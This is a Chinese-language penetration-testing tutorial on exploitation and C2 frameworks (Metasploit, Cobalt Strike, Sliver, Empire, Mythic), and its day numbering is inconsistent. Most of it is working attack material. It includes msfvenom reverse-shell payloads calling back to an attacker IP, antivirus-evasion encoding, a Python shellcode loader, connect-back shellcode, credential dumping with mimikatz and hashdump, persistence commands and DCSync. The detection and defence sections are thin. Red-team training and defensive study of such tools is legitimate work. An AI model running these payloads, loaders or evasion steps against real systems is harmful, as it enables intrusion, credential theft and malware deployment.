Day-187-渗透测试中的漏洞利用框架

# Day 228: 渗透测试中的漏洞利用框架

> 渗透测试系列第 18 天 | 预计阅读时间：45 分钟 | 难度：★★★★★

---

## 清单 目录
1. [漏洞利用框架概述](#漏洞利用框架概述)
2. [Metasploit Framework](#metasploit-framework)
3. [Cobalt Strike](#cobalt-strike)
4. [Sliver C2](#sliver-c2)
5. [Empire](#empire)
6. [Mythic](#mythic)
7. [框架对比与选择](#框架对比与选择)
8. [漏洞利用开发](#漏洞利用开发)
9. [免杀技术](#免杀技术)
10. [后渗透模块](#后渗透模块)
11. [检测与防御](#检测与防御)
12. [实战案例](#实战案例)
13. [总结与思考](#总结与思考)
14. [参考资料](#参考资料)

---

## 漏洞利用框架概述

### 什么是漏洞利用框架

漏洞利用框架 (Exploitation Framework) 是集成漏洞扫描、漏洞利用、载荷生成、后渗透等功能于一体的综合渗透测试平台。它大大降低了渗透测试的技术门槛，提高了测试效率。

```
┌─────────────────────────────────────────────────────────────┐
│                  漏洞利用框架核心功能                        │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  漏洞利用框架：                                              │
│  ┌─────────────────────────────────────────────────────┐   │
│  │  1. 信息收集                                         │   │
│  │     - 端口扫描                                       │   │
│  │     - 服务识别                                       │   │
│  │     - 漏洞扫描                                       │   │
│  │                                                      │   │
│  │  2. 漏洞利用                                         │   │
│  │     - 漏洞匹配                                       │   │
│  │     - 载荷投递                                       │   │
│  │     - 权限获取                                       │   │
│  │                                                      │   │
│  │  3. 后渗透                                           │   │
│  │     - 权限提升                                       │   │
│  │     - 凭证窃取                                       │   │
│  │     - 横向移动                                       │   │
│  │                                                      │   │
│  │  4. 报告生成                                         │   │
│  │     - 漏洞报告                                       │   │
│  │     - 风险评估                                       │   │
│  │     - 修复建议                                       │   │
│  └─────────────────────────────────────────────────────┘   │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### 框架重要性

```
为什么需要漏洞利用框架:
├── 效率提升
│   ├── 自动化工具集成
│   ├── 标准化流程
│   └── 快速漏洞利用
├── 知识积累
│   ├── 漏洞库维护
│   ├── 利用代码共享
│   └── 技术传承
├── 协作便利
│   ├── 多用户支持
│   ├── 会话管理
│   └── 团队协作
└── 合规审计
    ├── 操作记录
    ├── 报告生成
    └── 审计追踪
```

### 主流框架对比

| 框架 | 类型 | 价格 | 特点 |
|------|------|------|------|
| **Metasploit** | 开源/商业 | 免费/$$$ | 最全面、社区活跃 |
| **Cobalt Strike** | 商业 | $$$$ | 红队首选、功能强大 |
| **Sliver** | 开源 | 免费 | 现代、Go 语言、类似 CS |
| **Empire** | 开源 | 免费 | PowerShell、后渗透强 |
| **Mythic** | 开源 | 免费 | 插件化、现代化 |
| **Brute Ratel** | 商业 | $$$$ | CS 替代、绕过好 |

---

## Metasploit Framework

### Metasploit 架构

```
Metasploit 架构:
├── 核心组件
│   ├── Msfconsole (控制台)
│   ├── Msfcli (命令行)
│   ├── Msfvenom (载荷生成)
│   └── Msfupdate (更新)
├── 模块类型
│   ├── Exploits (漏洞利用)
│   ├── Payloads (载荷)
│   ├── Auxiliaries (辅助)
│   ├── Post (后渗透)
│   ├── Encoders (编码)
│   └── Nops (空指令)
└── 数据库
    └── PostgreSQL (存储目标/会话)
```

### 基础使用

```bash
# 启动 Metasploit
msfconsole

# 数据库操作
msf> db_status                    # 检查数据库状态
msf> workspace -a target          # 添加工作区
msf> workspace                    # 列出工作区
msf> hosts                        # 列出主机
msf> services                     # 列出服务

# 搜索模块
msf> search type:exploit platform:windows
msf> search cve:2017-0144
msf> search eternalblue

# 使用模块
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use exploit/windows/smb/ms17_010_psexec

# 查看选项
msf> show options
msf> show advanced
msf> show payloads

# 设置选项
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> set LPORT 4444
msf> set PAYLOAD windows/meterpreter/reverse_tcp

# 执行利用
msf> exploit
msf> run
msf> exploit -j                  # 后台运行
```

### 载荷生成

```bash
# 使用 Msfvenom 生成载荷
# Windows 反向 Shell
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=192.168.1.50 LPORT=4444 \
    -f exe -o payload.exe

# Linux 反向 Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp \
    LHOST=192.168.1.50 LPORT=4444 \
    -f elf -o payload.elf

# Android 后门
msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.1.50 LPORT=4444 \
    -o payload.apk

# Web Shell
msfvenom -p php/meterpreter_reverse_tcp \
    LHOST=192.168.1.50 LPORT=4444 \
    -f raw -o shell.php

# 编码免杀
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=192.168.1.50 LPORT=4444 \
    -e x86/shikata_ga_nai -i 10 \
    -f exe -o payload_encoded.exe

# 查看编码器
msfvenom -l encoders
```

### Meterpreter 使用

```bash
# Meterpreter 会话
msf> sessions -l                   # 列出会话
msf> sessions -i 1                 # 进入会话 1
msf> sessions -k 1                 # 终止会话 1
msf> sessions -K                   # 终止所有会话

# Meterpreter 命令
meterpreter> sysinfo               # 系统信息
meterpreter> getuid                # 当前用户
meterpreter> getprivs              # 当前权限
meterpreter> pwd                   # 当前目录
meterpreter> ls                    # 列出文件
meterpreter> cd                    # 切换目录
meterpreter> upload                # 上传文件
meterpreter> download              # 下载文件
meterpreter> shell                 # 系统 shell
meterpreter> exit                  # 退出

# 权限提升
meterpreter> getsystem             # 提权到 SYSTEM
meterpreter> hashdump              # 转储哈希
meterpreter> mimikatz              # 运行 Mimikatz

# 横向移动
meterpreter> run autoroute -p      # 查看路由
meterpreter> run autoroute -s 10.0.0.0/24  # 添加路由
meterpreter> run post/windows/gather/credentials/mimikatz

# 持久化
meterpreter> run persistence -U -X -p 4444 -r 192.168.1.50
```

### 后渗透模块

```bash
# 信息收集
msf> use post/windows/gather/enum_logged_on_users
msf> use post/windows/gather/checkvm
msf> use post/windows/gather/enum_chrome

# 凭证窃取
msf> use post/windows/gather/credentials/mimikatz
msf> use post/windows/gather/credentials/windows_autologon
msf> use post/windows/gather/smart_hashdump

# 横向移动
msf> use post/windows/manage/enable_rdp
msf> use post/windows/manage/migrate
msf> use post/windows/manage/autoroute

# 权限提升
msf> use post/multi/recon/local_exploit_suggester
msf> use post/windows/escalate/getsystem_via_service
```

---

## Cobalt Strike

### Cobalt Strike 概述

```
Cobalt Strike 特点:
├── 商业软件
│   └── $3500/年 (标准版)
├── 红队首选
│   └── 功能全面、隐蔽性好
├── 团队协作
│   └── 多操作者支持
├── Malleable C2
│   └── 流量自定义
└── 强大后渗透
    └── Beacon 功能丰富
```

### 架构组件

```
Cobalt Strike 组件:
├── Team Server
│   ├── 团队服务器
│   ├── 会话管理
│   └── 载荷托管
├── Client
│   ├── 图形界面
│   ├── 操作界面
│   └── 报告生成
├── Beacon
│   ├── 后门载荷
│   ├── C2 通信
│   └── 后渗透
└── Scripts
    ├── Aggressor 脚本
    └── 扩展功能
```

### Team Server 配置

```bash
# 启动 Team Server
./teamserver [C2 IP] [Password] [Malleable Profile]

# 示例
./teamserver 192.168.1.50 password123 profiles/windows/beacon.profile

# Malleable C2 Profile
# 定义 Beacon 通信特征
http-get {
    set uri "/api/v1/analytics";
    
    client {
        header "Accept" "application/json";
        header "User-Agent" "Mozilla/5.0";
    }
    
    server {
        header "Content-Type" "application/json";
        header "Server" "nginx/1.18.0";
    }
}

http-post {
    set uri "/api/v1/events";
    
    client {
        header "Content-Type" "application/json";
    }
}
```

### Beacon 使用

```
# 生成 Beacon
# 在 Cobalt Strike Client 中:
# Attacks → Packages → Payload Generator

# Beacon 类型:
# - HTTPS Beacon (最常用)
# - DNS Beacon (隐蔽)
# - SMB Beacon (横向)
# - TCP Beacon (内网)
# - Bind Beacon (反向)

# Beacon 命令:
help                    # 帮助
sleep [ms]              # 设置休眠时间
connect [host] [port]   # 连接 Beacon
inject [pid] [listener] # 注入进程
spawn [listener]        # 生成新 Beacon
upload [local] [remote] # 上传文件
download [remote]       # 下载文件
shell [command]         # 执行命令
mimikatz                # 运行 Mimikatz
hashdump                # 转储哈希
portscan                # 端口扫描
```

### 后渗透功能

```
Beacon 后渗透:
├── 凭证窃取
│   ├── mimikatz
│   ├── hashdump
│   └── kerberos
├── 横向移动
│   ├── psexec
│   ├── winrm
│   └── ssh
├── 权限提升
│   ├── getsystem
│   ├── bypassuac
│   └── exploit
├── 持久化
│   ├── registry
│   ├── scheduled task
│   └── service
└── 文件操作
    ├── upload/download
    ├── ls/cd/pwd
    └── cat/mv/rm
```

---

## Sliver C2

### Sliver 概述

```
Sliver 特点:
├── 开源免费
│   └── GitHub 可下载
├── Go 语言开发
│   └── 跨平台支持
├── 类似 Cobalt Strike
│   └── 功能对标 CS
├── 现代化设计
│   └── 易扩展维护
└── 活跃社区
    └── 持续更新
```

### 安装与配置

```bash
# 安装 Sliver
curl https://sliver.sh/install | sudo bash

# 启动 Sliver Server
sudo -u sliver /opt/sliver/bin/sliver-server

# 启动 Sliver Client
sliver-client

# 连接到服务器
sliver-client -c [Server IP] -p [Port]
```

### 基本使用

```bash
# Sliver 命令
sliver> help                          # 帮助
sliver> version                       # 版本信息

# 监听器配置
sliver> mtls --lhost 0.0.0.0 --lport 8888
sliver> http --lhost 0.0.0.0 --lport 80
sliver> https --lhost 0.0.0.0 --lport 443 --domains example.com

# 生成载荷
sliver> generate --mtls c2.example.com:8888 --save /tmp/payload.exe
sliver> generate --http c2.example.com:80 --save /tmp/payload.exe
sliver> generate --https c2.example.com:443 --save /tmp/payload.exe

# 载荷格式
# --format: exe, dll, shellcode, service, etc.
# --os: windows, linux, macos
# --arch: amd64, 386, arm, etc.
```

### 会话管理

```bash
# 会话操作
sliver> sessions                      # 列出会话
sliver> sessions -k [ID]              # 终止会话
sliver> use [ID]                      # 进入会话

# 会话命令
[beacon]> info                        # 会话信息
[beacon]> pwd                         # 当前目录
[beacon]> ls                          # 列出文件
[beacon]> cd [path]                   # 切换目录
[beacon]> upload [local] [remote]     # 上传
[beacon]> download [remote]           # 下载
[beacon]> execute [binary]            # 执行
[beacon]> shell [command]             # Shell 命令
[beacon]> run [extension]             # 运行扩展

# 持久化
[beacon]> persistence --method [service|registry|task]
```

---

## Empire

### Empire 概述

```
Empire 特点:
├── PowerShell 为主
│   └── Windows 后渗透强
├── 开源免费
│   └── 社区维护
├── 模块化设计
│   └── 易扩展
└── 无文件攻击
    └── 内存执行
```

### 安装与启动

```bash
# 安装 Empire
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
./setup/install.sh

# 启动 Empire
./empire --server
./empire --client

# 或使用 Docker
docker-compose up -d
```

### 基本使用

```bash
# Empire 命令
(Empire) > help                       # 帮助
(Empire) > listeners                  # 监听器
(Empire) > agents                     # 代理
(Empire) > usestager                  # 载荷生成
(Empire) > usemodule                  # 使用模块

# 创建监听器
(Empire) > uselistener http
(Empire) > set Name http_listener
(Empire) > set Host 192.168.1.50
(Empire) > set Port 8080
(Empire) > execute

# 生成载荷
(Empire) > usestager windows/launcher_bat
(Empire) > set Listener http_listener
(Empire) > set Language powershell
(Empire) > generate
```

### 模块使用

```bash
# 信息收集
(Empire) > usemodule situational_awareness/network/powerview/get_user
(Empire) > usemodule situational_awareness/network/powerview/get_group

# 凭证窃取
(Empire) > usemodule credentials/mimikatz/lsadump
(Empire) > usemodule credentials/mimikatz/dcsync

# 横向移动
(Empire) > usemodule lateral_movement/invoke_psexec
(Empire) > usemodule lateral_movement/invoke_wmi

# 权限提升
(Empire) > usemodule privesc/getsystem
(Empire) > usemodule privesc/bypassuac
```

---

## Mythic

### Mythic 概述

```
Mythic 特点:
├── 插件化架构
│   └── 易扩展定制
├── Web 界面
│   └── 现代化 UI
├── 多载荷支持
│   └── 多种 Agent
├── 团队协作
│   └── 多用户支持
└── API 驱动
    └── 自动化集成
```

### 安装与配置

```bash
# 安装 Mythic
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
./start_mythic.sh

# 访问 Web 界面
# https://[IP]:7443

# 默认凭证
# username: mythic
# password: mythic
```

### 基本使用

```
Mythic 使用流程:
├── 1. 创建 Payload Type
│   └── 选择 Agent 类型
├── 2. 创建 Payload
│   └── 配置 C2 参数
├── 3. 下载 Payload
│   └── 投递到目标
├── 4. 等待回调
│   └── 建立会话
└── 5. 执行命令
    └── 后渗透操作
```

### Agent 类型

```
Mythic 支持 Agent:
├── Apollo
│   └── .NET Framework
├── Athena
│   └── Python
├── Poseidon
│   └── Go
├── Tritium
│   └── Rust
└── 社区 Agent
    └── 第三方开发
```

---

## 框架对比与选择

### 功能对比

| 功能 | Metasploit | Cobalt Strike | Sliver | Empire | Mythic |
|------|------------|---------------|--------|--------|--------|
| **价格** | 免费/$$$ | $$$$ | 免费 | 免费 | 免费 |
| **漏洞利用** | ★★★★★ | ★★★☆☆ | ★★☆☆☆ | ★★☆☆☆ | ★★★☆☆ |
| **后渗透** | ★★★★☆ | ★★★★★ | ★★★★☆ | ★★★★★ | ★★★★☆ |
| **团队协作** | ★★★☆☆ | ★★★★★ | ★★★★☆ | ★★★☆☆ | ★★★★★ |
| **隐蔽性** | ★★☆☆☆ | ★★★★★ | ★★★★☆ | ★★★☆☆ | ★★★★☆ |
| **易用性** | ★★★★☆ | ★★★★★ | ★★★★☆ | ★★★☆☆ | ★★★★☆ |
| **扩展性** | ★★★★☆ | ★★★★☆ | ★★★★☆ | ★★★★☆ | ★★★★★ |

### 使用场景

```
场景推荐:
├── 初学渗透测试
│   └── Metasploit (学习资源丰富)
├── 企业红队
│   └── Cobalt Strike (功能全面)
├── 预算有限
│   └── Sliver/Mythic (免费且强大)
├── Windows 环境
│   └── Empire (PowerShell 强)
├── 需要定制
│   └── Mythic (插件化)
└── 综合使用
    └── 多框架配合
```

---

## 漏洞利用开发

### 开发流程

```
漏洞利用开发流程:
├── 1. 漏洞研究
│   ├── 分析漏洞原理
│   ├── 确定影响版本
│   └── 复现漏洞
├── 2. 环境搭建
│   ├── 搭建测试环境
│   ├── 准备调试工具
│   └── 配置符号表
├── 3. 漏洞分析
│   ├── 逆向分析
│   ├── 定位漏洞点
│   └── 确定利用条件
├── 4. 利用编写
│   ├── Shellcode 编写
│   ├── 利用逻辑实现
│   └── 稳定性测试
├── 5. 集成框架
│   ├── 模块编写
│   ├── 参数配置
│   └── 文档编写
└── 6. 测试发布
    ├── 功能测试
    ├── 兼容性测试
    └── 提交社区
```

### Metasploit 模块开发

```ruby
# Metasploit 模块示例
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Example Exploit',
      'Description'    => %q{
        This is an example exploit module.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['Author Name'],
      'References'     => [
        ['CVE', '2023-1234'],
        ['URL', 'https://example.com']
      ],
      'Platform'       => 'win',
      'Targets'        => [
        ['Windows Target', { 'Ret' => 0xdeadbeef }]
      ],
      'Payload'        => {
        'BadChars' => "\x00\x0a\x0d",
      },
      'Privileged'     => true,
      'DisclosureDate' => '2023-01-01',
      'DefaultTarget'  => 0
    ))

register_options([
      Opt::RHOST(),
      Opt::RPORT(12345)
    ])
  end

def exploit
    connect
    print_status("Connecting to target...")
    
    # 漏洞利用逻辑
    buf = "\x90" * 1000  # NOP sled
    buf << [target['Ret']].pack('V')  # Return address
    buf << payload.encoded  # Shellcode
    
    sock.put(buf)
    
    handler
    disconnect
  end
end
```

### Shellcode 开发

```python
# Python Shellcode 示例
# 使用 pwntools

from pwn import *

# 生成 execve shellcode
shellcode = shellcraft.execve('/bin/sh', [], [])
print(asm(shellcode))

# 生成 reverse shell shellcode
shellcode = shellcraft.connectback('192.168.1.50', 4444)
shellcode += shellcraft.dup2()
shellcode += shellcraft.execve('/bin/sh', [], [])
print(asm(shellcode))

# 编码 Shellcode
encoded = xor(shellcode, 0x41)
print(encoded)
```

---

## 免杀技术

### 免杀方法

```
免杀技术分类:
├── 编码
│   ├── Base64 编码
│   ├── XOR 编码
│   └── 自定义编码
├── 加密
│   ├── AES 加密
│   ├── RSA 加密
│   └── 自定义加密
├── 拆分
│   ├── 分阶段下载
│   ├── 多部分组合
│   └── 动态拼接
├── 注入
│   ├── 进程注入
│   ├── DLL 注入
│   └── APC 注入
└── 混淆
    ├── 代码混淆
    ├── 字符串混淆
    └── 控制流混淆
```

### Msfvenom 免杀

```bash
# 单次编码
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=192.168.1.50 LPORT=4444 \
    -e x86/shikata_ga_nai -i 10 \
    -f exe -o payload.exe

# 多次编码
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=192.168.1.50 LPORT=4444 \
    -e x86/shikata_ga_nai -i 10 | \
    msfvenom -e x86/countdown -i 10 \
    -f exe -o payload.exe

# 自定义模板
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=192.168.1.50 LPORT=4444 \
    -x legitimate.exe -k \
    -f exe -o payload.exe
```

### 加载器开发

```python
# Python 加载器示例
import ctypes
import base64

# Base64 编码的 Shellcode
shellcode_b64 = "YOUR_ENCODED_SHELLCODE"

# 解码
shellcode = base64.b64decode(shellcode_b64)

# 分配内存
ptr = ctypes.windll.kernel32.VirtualAlloc(
    ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40)
)

# 写入内存
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_int(ptr),
    shellcode,
    ctypes.c_int(len(shellcode))
)

# 执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)

ctypes.windll.kernel32.WaitForSingleObject(
    ctypes.c_int(handle),
    ctypes.c_int(-1)
)
```

---

## 后渗透模块

### 信息收集

```
信息收集模块:
├── 系统信息
│   ├── 操作系统版本
│   ├── 补丁级别
│   └── 硬件信息
├── 用户信息
│   ├── 当前用户
│   ├── 本地用户
│   └── 域用户
├── 网络信息
│   ├── 网络配置
│   ├── 路由表
│   └── 连接信息
├── 进程信息
│   ├── 运行进程
│   ├── 服务列表
│   └── 启动项
└── 文件信息
    ├── 敏感文件
    ├── 配置文件
    └── 历史记录
```

### 凭证窃取

```
凭证窃取技术:
├── LSASS 转储
│   ├── Mimikatz
│   ├── ProcDump
│   └── Comsvcs
├── 注册表提取
│   ├── SAM
│   ├── SYSTEM
│   └── SECURITY
├── 浏览器凭证
│   ├── Chrome
│   ├── Firefox
│   └── Edge
├── 凭据管理器
│   ├── Windows Vault
│   └── Credential Manager
└── 应用凭证
    ├── Git
    ├── SVN
    └── 数据库客户端
```

### 横向移动

```
横向移动技术:
├── PsExec
│   └── 远程执行
├── WMI
│   └── 远程管理
├── WinRM
│   └── PowerShell 远程
├── RDP
│   └── 远程桌面
├── SMB
│   └── 文件共享
└── SSH
    └── 安全 Shell
```

---

## 检测与防御

### 框架检测特征

```
Metasploit 检测:
├── 网络特征
│   ├── 默认端口 (4444)
│   ├── 协议特征
│   └── 通信模式
├── 载荷特征
│   ├── 默认 Shellcode
│   ├── 编码特征
│   └── 文件特征
└── 行为特征
    ├── 进程注入
    ├── 内存操作
    └── 权限提升
```

```
Cobalt Strike 检测:
├── Beacon 特征
│   ├── HTTP 请求模式
│   ├── DNS 查询模式
│   └── 休眠模式
├── 内存特征
│   ├── 内存分配模式
│   ├── 线程注入
│   └── 字符串特征
└── 证书特征
    ├── 自签名证书
    └── 证书哈希
```

### 防御措施

```
防御建议:
├── 网络层
│   ├── 入侵检测
│   ├── 流量分析
│   └── 防火墙规则
├── 终端层
│   ├── EDR 解决方案
│   ├── 应用白名单
│   └── 行为监控
├── 身份层
│   ├── 多因素认证
│   ├── 最小权限
│   └── 凭证保护
└── 响应层
    ├── 事件响应
    ├── 威胁狩猎
    └── 持续监控
```

---

## 实战案例

### 案例一：企业内网渗透

```
场景：某企业内网渗透测试
目标：评估内网安全
时间：1 周

流程:
┌─────────────────────────────────────────────────────────┐
│ Day 1: 初始访问                                         │
│ - 钓鱼邮件获取初始访问                                  │
│ - 部署 Cobalt Strike Beacon                            │
├─────────────────────────────────────────────────────────┤
│ Day 2-3: 信息收集                                       │
│ - 使用 BloodHound 分析 AD                               │
│ - 发现域管路径                                          │
├─────────────────────────────────────────────────────────┤
│ Day 4: 权限提升                                         │
│ - Kerberoasting 获取服务账户                            │
│ - 本地提权获取 SYSTEM                                   │
├─────────────────────────────────────────────────────────┤
│ Day 5: 横向移动                                         │
│ - DCSync 获取所有域哈希                                 │
│ - Golden Ticket 持久化                                  │
├─────────────────────────────────────────────────────────┤
│ Day 6-7: 报告                                           │
│ - 整理发现                                              │
│ - 编写报告                                              │
│ - 提交建议                                              │
└─────────────────────────────────────────────────────────┘
```

---

## 总结与思考

### 核心要点回顾

1. **框架是渗透测试核心工具**
   - 提高效率
   - 标准化流程
   - 知识积累

2. **选择合适的框架**
   - 根据场景选择
   - 多框架配合
   - 持续学习

3. **免杀是必备技能**
   - 编码加密
   - 注入混淆
   - 持续更新

4. **后渗透是关键**
   - 信息收集
   - 凭证窃取
   - 横向移动

5. **了解检测特征**
   - 避免被检测
   - 改进隐蔽性
   - 测试防御

### 实战建议

1. **对渗透测试人员**:
   - 精通至少一个框架
   - 学习免杀技术
   - 了解检测特征
   - 持续学习更新

2. **对防御人员**:
   - 了解框架特征
   - 部署检测规则
   - 定期演练
   - 持续监控

---

## 参考资料

### 学习资源

- **Metasploit Unleashed**
  - https://www.offensive-security.com/metasploit-unleashed/

- **Cobalt Strike Manual**
  - https://cobaltstrike.com/help

- **Sliver Documentation**
  - https://sliver.sh/docs

### 工具资源

| 工具 | 用途 | 链接 |
|------|------|------|
| **Metasploit** | 漏洞利用 | https://www.metasploit.com/ |
| **Cobalt Strike** | 红队平台 | https://cobaltstrike.com/ |
| **Sliver** | C2 框架 | https://github.com/BishopFox/sliver |
| **Empire** | 后渗透 | https://github.com/BC-SECURITY/Empire |
| **Mythic** | C2 平台 | https://github.com/its-a-feature/Mythic |
| **Msfvenom** | 载荷生成 | Metasploit 套件 |

### 书籍推荐

1. **《Metasploit: The Penetration Tester's Guide》**
   - Metasploit 权威指南

2. **《Red Team Development and Operations》**
   - 红队操作手册

3. **《The Hacker Playbook 3》**
   - 实战渗透测试

---

*365 天信息安全技术系列 | Day 228 | 渗透测试系列 | 漏洞利用框架*
*创建时间：2026-04-12 | 作者：安全专家 · 严谨专业版*